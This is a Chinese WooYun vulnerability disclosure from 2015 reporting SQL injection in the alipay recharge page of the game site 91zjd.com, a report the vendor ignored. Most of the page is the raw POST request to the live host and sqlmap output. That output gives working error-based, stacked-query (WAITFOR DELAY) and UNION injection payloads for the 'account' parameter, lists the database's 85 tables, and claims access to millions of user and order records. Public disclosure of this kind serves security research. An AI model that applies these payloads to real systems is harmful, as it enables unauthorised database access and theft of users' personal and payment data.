当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154213

漏洞标题:紫金岛游戏主站存在SQL漏洞可UNION(200万用户信息及千万订单信息)

相关厂商:91zjd.com

漏洞作者: 路人甲

提交时间:2015-11-19 09:44

修复时间:2015-11-25 09:00

公开时间:2015-11-25 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-19: 细节已通知厂商并且等待厂商处理中
2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /recharge/alipay_recharge.asp HTTP/1.1
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDCSTTDCDB=KLFDBCBAJGFLMKFJLJJMCKNL; ASP.NET_SessionId=514hzo55fo1wrz55ipgybo55; Hm_lvt_d5924889d984deffd476e1699e74ce59=1447669732,1447669829,1447669830,1447669852; Hm_lpvt_d5924889d984deffd476e1699e74ce59=1447669852; CNZZDATA4818108=cnzz_eid%3D899435885-1447669577-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447669577; bdshare_firstime=1447669578206; HMACCOUNT=23FE2290393AAD15; BAIDUID=B65CAF626516BDEBC3DF19CD8CC25F5B:FG=1
Host: www.91zjd.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111&againaccount=4111111111111111&DropDownList1=1&txtyzm=1

22.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: account (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111' AND 7184=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7184=7184) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(98)+CHAR(113))) AND 'yPCg'='yPCg&againaccount=4111111111111111&DropDownList1=1&txtyzm=1
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111';WAITFOR DELAY '0:0:5'--&againaccount=4111111111111111&DropDownList1=1&txtyzm=1
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=-8992' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(73)+CHAR(68)+CHAR(112)+CHAR(107)+CHAR(88)+CHAR(98)+CHAR(117)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(98)+CHAR(113)-- &againaccount=4111111111111111&DropDownList1=1&txtyzm=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
Database: QPGameUserDB
[85 tables]
+------------------------------+
| 168logo_ForTG |
| 168logo_ForTeam |
| 168logo_ForTeam |
| AccountsInfo0821 |
| AccountsInfo1121 |
| AccountsInfo_20131010 |
| AccountsInfo_20131010 |
| AccountsInfo_emailbak |
| AccountsInfo_emailbak |
| AccountsInfo_regtj |
| AccountsInfo_temp1 |
| AccountsInfo_temp1 |
| AccountsInfo_xt |
| AccountsInfobak |
| ConfineAddress |
| ConfineContent |
| ConfineMachine |
| CustomTable |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| DIY_TEMPCOMMAND_TABLE |
| DailyLogonPrize |
| GameIdentifier |
| GameUserBang_New_tyb |
| GameUserBang_TYBLogo |
| GameUserBang_TYB_WEEKLY_view |
| GameUserBang_TYB_WEEKLY_view |
| GameUserBang_abest_view |
| GameUserBang_abest_view |
| GoldEggsLog20110 |
| GoldEggsLog20110 |
| GoldEggsLog20110 |
| GoldEggsLog2012 |
| IndividualDatumFirend |
| IndividualDatumbak |
| IndividualDatumbak |
| LuckUser |
| PK_GameDownloadCount |
| PK_RegSourceIp |
| PK_SOURCE_IP_POOL |
| PK_WebPage_Click_Count |
| QPGameUserDB |
| QQcdkey |
| Rechargeable_Card_TEST |
| Rechargeable_Card_TEST |
| Reg_Arrt |
| S3_Tmp |
| ShortUrlLink |
| SystemStatusInfo |
| SystemStreamInfo |
| UserAddScoreLogo |
| UserMemberOrder |
| UserWincountlogo |
| VW_Charge_List |
| View_AccountsInfo_regtjNew |
| View_AccountsInfo_regtjNew |
| View_CZK_TG |
| View_Rechargeable_Card_tg |
| View_TYB_USERBANG |
| View_UserALLLogo_bySpid |
| View_UserALLLogo_bySpid |
| View_UserFristLogo |
| View_UserLogoNew |
| View_UserLogoNew |
| View_Userinfo_ME |
| View_VWUserFristLogo |
| View_t1 |
| View_t310 |
| View_t320 |
| View_t500 |
| Yjt_accounts |
| accountsinfo20110101 |
| comd_list |
| dxUserbak |
| dxuserall |
| dxuserall |
| dxuserlist |
| iphonetemp1 |
| iphonetemp1 |
| iphonetemp2 |
| sqlmapoutput |
| tempUsername |
| tempcity |
| we |
+------------------------------+

222万用户信息:

23.png

千万订单信息:

24.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-25 09:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无